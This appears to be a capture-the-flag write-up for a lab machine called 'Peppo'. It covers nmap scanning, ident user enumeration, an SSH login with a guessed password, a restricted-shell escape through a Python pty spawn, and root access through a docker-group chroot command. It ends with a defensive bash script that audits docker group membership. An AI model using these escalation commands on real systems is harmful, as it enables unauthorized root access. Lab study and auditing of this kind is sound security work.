# Peppo

## Nmap

```
sudo nmap 192.168.100.60 -p- -sS -sV

PORT      STATE  SERVICE           VERSION
22/tcp    open   ssh               OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
53/tcp    closed domain
113/tcp   open   ident             FreeBSD identd
5432/tcp  open   postgresql        PostgreSQL DB 9.6.0 or later
8080/tcp  open   http              WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
10000/tcp open   snet-sensor-mgmt?
```

As `ident` is running, we can use the Perl script `ident-user-enum` to identify which user each service is running as.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4f2653b57c82952a7e6a5d237dbd5b8375e869fa%2Fimage.png?alt=media)

Port 10000 reports it is running under the user 'eleanor'. I tried brute-forcing the username on `SSH` and had no luck. Eventually, simply trying `eleanor:elenaor`, I was able to log in on SSH.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-14109aff6f377b831d54001d3bf8a0274e0b1494%2Fimage.png?alt=media)

Trying the `id` command shows that we are locked in a restricted bash shell. Viewing `$PATH` shows which binaries we have access to.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fa761c917db3614b693f6cfc55badeff4cdb2c9e%2Fimage.png?alt=media)

Checking GTFObins for any of these binaries that can spawn a shell to escape the restricted one:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-db09b92348595d1be26d3813e601f3867e28f584%2Fimage.png?alt=media)

After running the above command, we can export a new path, spawn a Python shell, and then export the path again to have full functionality over the shell session.

```
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dd98b7477c6abd3373c8878ad51c3db37d94f602%2Fimage.png?alt=media)

The command `id` shows we are a member of the docker group. GTFObins again shows a method for spawning a root shell when we are a member of the docker group.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c1be5c46dcdfdb90150d9ea6c6c328c8614edb86%2Fimage.png?alt=media)

First check what images we have available to us:

```
docker image ls
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-efc2518a4bfbd50a685ce6a5dbf8652a50720b38%2Fimage.png?alt=media)

We can use the GTFObins command, replacing the value `<alpine>` with one of the images listed above.

```
docker run -v /:/mnt --rm -it redmine chroot /mnt sh
```

Returning a shell as root:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9c1d3778e808ece3b949568ee268874afac6afe3%2Fimage.png?alt=media)
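From the defender's side, the finding here is that docker group membership is root-equivalent no matter how restricted the login shell is. The audit sketch below is an added example, not part of the original write-up; the sample `group` and `passwd` contents, the `svc_build` account and the `/bin/rbash` path are constructed for illustration.

```bash
# Added audit example; the sample files below are constructed, not taken from the target.

# docker_group_members GROUP_FILE PASSWD_FILE
# Prints "user shell" for accounts with docker as a supplementary or primary group.
docker_group_members() {
    awk -F: '
        NR == FNR {                       # first file: group(5)
            if ($1 == "docker") {
                gid = $3
                n = split($4, m, ",")
                for (i = 1; i <= n; i++) if (m[i] != "") member[m[i]] = 1
            }
            next
        }
        ($1 in member) || (gid != "" && $4 == gid) { print $1, $7 }   # passwd(5)
    ' "$1" "$2"
}

# audit_docker_group GROUP_FILE PASSWD_FILE
# Flags non-root members; a restricted login shell gets the higher rating because
# the restriction suggests the account was never meant to hold root-level access.
audit_docker_group() {
    docker_group_members "$1" "$2" | while read -r user shell; do
        [ "$user" = "root" ] && continue
        case "$shell" in
            */rbash|*/rksh|*/rzsh) echo "HIGH $user ($shell): restricted shell, but docker group is root-equivalent" ;;
            *) echo "WARN $user ($shell): docker group is root-equivalent" ;;
        esac
    done
}

# run_sample: builds constructed group/passwd files and audits them.
run_sample() {
    dir=$(mktemp -d) || return 1
    cat > "$dir/group" <<'EOF'
root:x:0:
docker:x:999:eleanor
EOF
    cat > "$dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
eleanor:x:1000:1000::/home/eleanor:/bin/rbash
svc_build:x:1001:999::/home/svc_build:/bin/bash
postgres:x:110:115::/var/lib/postgresql:/bin/bash
EOF
    audit_docker_group "$dir/group" "$dir/passwd"
    rm -rf "$dir"
}

run_sample
```

On a real host, pass `/etc/group` and `/etc/passwd` to `audit_docker_group`; accounts resolved through LDAP or SSSD need `getent group` and `getent passwd` output saved to files instead.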

